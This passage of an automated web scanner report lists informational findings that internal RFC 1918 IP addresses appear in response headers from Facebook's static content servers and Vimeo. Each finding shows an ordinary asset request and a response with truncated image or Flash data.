Path:   /rsrc.php/v1/zS/r/6DyuwYMrMc0.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zS/r/6DyuwYMrMc0.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 11 Jul 2011 01:48:16 GMT
X-FB-Server: 10.138.69.182
Content-Length: 21551
Vary: Accept-Encoding
Cache-Control: public, max-age=30806170
Expires: Tue, 10 Jul 2012 04:14:07 GMT
Date: Tue, 19 Jul 2011 14:57:57 GMT
Connection: close

.PNG
.
...IHDR...!...............S.IDATx...yp....-..[..o.....eY..z....{.k.....Q...."......dGV... l......HH ... .x.{.KB...."......Tz..d....S..V........>...3.......$w.=...'$..v..;.H..Bh...wH..Q..n.
...[SNIP]...

24.151. http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/ccgKJX0yQZC.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zS/r/ccgKJX0yQZC.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zS/r/ccgKJX0yQZC.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 07 Jun 2011 17:59:39 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 3020
Vary: Accept-Encoding
Cache-Control: public, max-age=28380367
Expires: Tue, 12 Jun 2012 02:23:30 GMT
Date: Tue, 19 Jul 2011 14:57:23 GMT
Connection: close

.PNG
.
...IHDR.......0...........
CiCCPICC profile..x..SwX...>..e.VB....l.."#....Y....a...@...
V....HU...
H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p
...[SNIP]...

24.152. http://static.ak.fbcdn.net/rsrc.php/v1/zT/r/dDagbUnwf34.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zT/r/dDagbUnwf34.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zT/r/dDagbUnwf34.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/careers/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 55176
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:14 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Cache-Control: public, max-age=30424082
Expires: Thu, 05 Jul 2012 18:05:58 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

.PNG
.
...IHDR.............rl<....OIDATx^..w.-Yv......&.y.W........h.$H........D.G..IC.8...H$A.R$A...H..4L{W]].=...K...k&..XwUMa.X...Z."...{#..........W........i....3Ms:\...\........0..,.
....f..g.
...[SNIP]...

24.153. http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/gLuMARNlxxj.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zU/r/gLuMARNlxxj.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zU/r/gLuMARNlxxj.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 667
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:16 GMT
X-FB-Server: 10.138.64.185
Cache-Control: public, max-age=30198653
Expires: Tue, 03 Jul 2012 03:28:51 GMT
Date: Tue, 19 Jul 2011 14:57:58 GMT
Connection: close

.PNG
.
...IHDR.......4.....[.#M...#PLTE......;Y....;}"p^P......n.......Pm.....v.....b.M/d.......q../Gz...Wp.Zs....^v............Wq.W.....n..p.....x....b..s...........:.\.............C`.Kg..........
...[SNIP]...

24.154. http://static.ak.fbcdn.net/rsrc.php/v1/zV/r/-pf2bdz3vEg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zV/r/-pf2bdz3vEg.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zV/r/-pf2bdz3vEg.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/directory/people/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 231
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 12:49:56 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.145.196
X-Cnection: close
Cache-Control: public, max-age=20580622
Expires: Tue, 13 Mar 2012 19:47:59 GMT
Date: Tue, 19 Jul 2011 14:57:37 GMT
Connection: close

GIF89a..........Da....;Y.......q........Je.Lg.........|.....Sm.@].Hd.Vp.=Z....Wq....Ie.Xr....Fb.?\..........!.......,..........d.'.....#.l+bH'....ZW4YSt..K.q."..B l.:    .......K.0..:......"."A,..f.. ..
...[SNIP]...

24.155. http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/1gBp2bDGEuh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zY/r/1gBp2bDGEuh.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zY/r/1gBp2bDGEuh.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 143
Content-Type: image/gif
Last-Modified: Mon, 15 Mar 2010 12:39:11 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.16.184
Cache-Control: public, max-age=20666477
Expires: Wed, 14 Mar 2012 19:39:10 GMT
Date: Tue, 19 Jul 2011 14:57:53 GMT
Connection: close

GIF89a....................................iii...............!.......,.........<0.I..
.;..Al.71d.....0|.*....v6.+........R...h. ..2.$..lB...;

24.156. http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/6HL8HSM452G.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zY/r/6HL8HSM452G.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zY/r/6HL8HSM452G.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 963
Content-Type: image/png
Last-Modified: Mon, 11 Jul 2011 01:48:16 GMT
X-FB-Server: 10.138.17.184
Cache-Control: public, max-age=30840135
Expires: Tue, 10 Jul 2012 13:40:12 GMT
Date: Tue, 19 Jul 2011 14:57:57 GMT
Connection: close

.PNG
.
...IHDR.......k......
.o...5PLTE........;..<....rS...........;..Z....;.....=...sy..........fm{......Ok...<.G.......rS..k........=..[.....YHPa........[..Y..Z.LM...rpm......n...sS;Y....wuq.l3
...[SNIP]...

24.157. http://static.ak.fbcdn.net/rsrc.php/v1/z_/r/2Oin6nHA4Mx.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z_/r/2Oin6nHA4Mx.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z_/r/2Oin6nHA4Mx.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 252
Content-Type: image/png
Last-Modified: Wed, 02 Mar 2011 05:36:29 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Cache-Control: public, max-age=24751328
Expires: Tue, 01 May 2012 02:20:00 GMT
Date: Tue, 19 Jul 2011 14:57:52 GMT
Connection: close

.PNG
.
...IHDR...................HPLTE........................................................................aO9....oIDATx^..G..A.DQ......oJ#.. v..Oe.r^L....i.O..U.E!j.!...M.9.l>....o...........%"
...[SNIP]...

24.158. http://static.ak.fbcdn.net/rsrc.php/v1/zb/r/3LyZkLVshsc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zb/r/3LyZkLVshsc.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zb/r/3LyZkLVshsc.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 14:02:44 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.191
X-Cnection: close
Cache-Control: public, max-age=20585087
Expires: Tue, 13 Mar 2012 21:02:34 GMT
Date: Tue, 19 Jul 2011 14:57:47 GMT
Connection: close

GIF89a.............!.......,...........D..;

24.159. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/1x0T5GU6FqP.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ze/r/1x0T5GU6FqP.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ze/r/1x0T5GU6FqP.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 71
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 14:37:52 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.186
Cache-Control: public, max-age=20587199
Expires: Tue, 13 Mar 2012 21:37:33 GMT
Date: Tue, 19 Jul 2011 14:57:34 GMT
Connection: close

GIF89a.......;Y.D`.Zs.ay.............!.......,...........(............;

24.160. http://static.ak.fbcdn.net/rsrc.php/v1/zh/r/HNHvoJkgN6x.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zh/r/HNHvoJkgN6x.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zh/r/HNHvoJkgN6x.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:18 GMT
X-FB-Server: 10.138.16.183
Content-Length: 16711
Vary: Accept-Encoding
Cache-Control: public, max-age=30424651
Expires: Thu, 05 Jul 2012 18:15:28 GMT
Date: Tue, 19 Jul 2011 14:57:57 GMT
Connection: close

.PNG
.
...IHDR.......>.....].(.....tRNS......    .....@.IDATx^..A........M%...i3..aFt2=.tP.@.....[....1...=h5.G""..A..    ..C&dB&..    ..)3{.dB...    ..)F.J..j...dB&d.g.|_.
.8....Qo{.L. D..X...}!Y.WF..EA).&..N
...[SNIP]...

24.161. http://static.ak.fbcdn.net/rsrc.php/v1/zi/r/PbmUudSYZ0z.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zi/r/PbmUudSYZ0z.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zi/r/PbmUudSYZ0z.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:13 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Content-Length: 12026
Vary: Accept-Encoding
Cache-Control: public, max-age=30424070
Expires: Thu, 05 Jul 2012 18:05:24 GMT
Date: Tue, 19 Jul 2011 14:57:34 GMT
Connection: close

.PNG
.
...IHDR...-...........#....tRNS......    .......IDATx^..1..@..q.u...h..VM
B..-E..t....SK......Q..]....o..=.y.W.n..:.@.....C....!@..........T..hJ=.......Z...-. .........:$.Y...>.zo.t8.........j.
...[SNIP]...

24.162. http://static.ak.fbcdn.net/rsrc.php/v1/zl/r/6N9FQPpTHCy.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zl/r/6N9FQPpTHCy.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zl/r/6N9FQPpTHCy.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 820
Content-Type: image/png
Last-Modified: Tue, 07 Jun 2011 17:59:39 GMT
X-FB-Server: 10.30.145.195
X-Cnection: close
Cache-Control: public, max-age=28380419
Expires: Tue, 12 Jun 2012 02:24:23 GMT
Date: Tue, 19 Jul 2011 14:57:24 GMT
Connection: close

.PNG
.
...IHDR.......0.............sRGB.........bKGD.............    pHYs.................tIME.....2........"tEXtComment.Created with GIMP on a Mac..wC....IDATx^...m.0..P%...6vo.#_&....,......#@.....V
...[SNIP]...

24.163. http://static.ak.fbcdn.net/rsrc.php/v1/zp/r/-dio0u9UIlC.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zp/r/-dio0u9UIlC.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zp/r/-dio0u9UIlC.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 9600
Content-Type: image/png
Last-Modified: Wed, 29 Jun 2011 21:13:46 GMT
X-FB-Server: 10.30.145.198
X-Cnection: close
Cache-Control: public, max-age=30196906
Expires: Tue, 03 Jul 2012 02:59:28 GMT
Date: Tue, 19 Jul 2011 14:57:42 GMT
Connection: close

.PNG
.
...IHDR..............r-.....tRNS......    .....%5IDATx^..?..E....6....{.F...,l..,....7..iR. .H..".6...2.
   ..C0j....2.=g.!...a.............].......[._=\...7......f.:..W..7l...W...)..0....kkG.?.M.
...[SNIP]...

24.164. http://static.ak.fbcdn.net/rsrc.php/v1/zr/r/XXVvDYAks_i.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zr/r/XXVvDYAks_i.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zr/r/XXVvDYAks_i.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 667
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 12:48:32 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.16.182
Cache-Control: public, max-age=20580600
Expires: Tue, 13 Mar 2012 19:47:46 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

.PNG
.
...IHDR...'... ......x......PLTE......:X....;X.;X.Nh.;Y.,Bq,Cr;Y.;Y....;Y.......':c:W.7S.:X.*@l..2.Eu@]..#...+An......,Br:X.9W.9W.Zt....az.Vq.To.Pk.Xs.e}.e~.;Y....q..f~.Ea.c|.x........Ql.w..
...[SNIP]...

24.165. http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/YoX0fw76s5z.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zs/r/YoX0fw76s5z.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zs/r/YoX0fw76s5z.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/directory/people/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 48
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 12:51:36 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.190
X-Cnection: close
Cache-Control: public, max-age=20580844
Expires: Tue, 13 Mar 2012 19:51:41 GMT
Date: Tue, 19 Jul 2011 14:57:37 GMT
Connection: close

GIF89a.............!.......,.................
.;

24.166. http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/fzdZPrLUwxB.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zs/r/fzdZPrLUwxB.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zs/r/fzdZPrLUwxB.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 10858
Content-Type: image/png
Last-Modified: Sun, 10 Jul 2011 12:18:43 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Cache-Control: public, max-age=30837934
Expires: Tue, 10 Jul 2012 13:03:05 GMT
Date: Tue, 19 Jul 2011 14:57:31 GMT
Connection: close

.PNG
.
...IHDR...$... ........:..*1IDATx^..-s.A.....+cQH..s....p'...H$
.A".HL..$@q..r.G...@....F.......R..U..L....t.............W^FL...?G..#N......mY.]..|.8.........q@.....#.}...2>.....!.k|.'...:...
...[SNIP]...

24.167. http://static.ak.fbcdn.net/rsrc.php/v1/zu/r/Y4_2_kJqyhn.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zu/r/Y4_2_kJqyhn.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zu/r/Y4_2_kJqyhn.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 14:22:33 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.185
Cache-Control: public, max-age=20586262
Expires: Tue, 13 Mar 2012 21:21:55 GMT
Date: Tue, 19 Jul 2011 14:57:33 GMT
Connection: close

GIF89a.......|.....!.......,...........D
.;

24.168. http://static.ak.fbcdn.net/rsrc.php/v1/zx/r/cDpiVvg8Q0u.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zx/r/cDpiVvg8Q0u.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zx/r/cDpiVvg8Q0u.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Wed, 29 Jun 2011 21:13:44 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 21669
Vary: Accept-Encoding
Cache-Control: public, max-age=30314966
Expires: Wed, 04 Jul 2012 11:47:13 GMT
Date: Tue, 19 Jul 2011 14:57:47 GMT
Connection: close

.PNG
.
...IHDR...............B[....tRNS......    .....TZIDATx^...oSe..q./}7.....^`x#&.....3...f*d..M.........C....Zi..@q...G......    ...o..;'.$..=.1...    =[..|...}.lYZ.[..X6...?.j.V.....d.......:.....L$..~
...[SNIP]...

24.169. http://static.ak.fbcdn.net/rsrc.php/v1/zz/r/z1xzUcShxUD.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zz/r/z1xzUcShxUD.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zz/r/z1xzUcShxUD.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 588
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:16 GMT
X-FB-Server: 10.138.17.182
Cache-Control: public, max-age=30200000
Expires: Tue, 03 Jul 2012 03:51:02 GMT
Date: Tue, 19 Jul 2011 14:57:42 GMT
Connection: close

.PNG
.
...IHDR...!...F.....u......PLTE......CW.......^uq.....................U.......T\lx..l}...........N....0D..........q.................{.......................v......%....................;....
...[SNIP]...

24.170. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=9957660&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://feeds.feedburner.com/netsparker

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:41:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-6~dotdeb.0
Expires: Tue, 19 Jul 2011 03:41:20 GMT
X-Server: 10.90.128.53
Vary: Accept-Encoding
Content-Length: 291
Connection: close
Content-Type: application/x-shockwave-flash

FWS.#...p...........?........
.http%3A%2F%2Ffeeds.feedburner.com%2Fnetsparker.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/f
...[SNIP]...

24.171. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=9957644&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://feeds.feedburner.com/netsparker

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:41:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-6~dotdeb.0
Expires: Tue, 19 Jul 2011 03:41:20 GMT
X-Server: 10.90.128.67
Vary: Accept-Encoding
Content-Length: 291
Connection: close
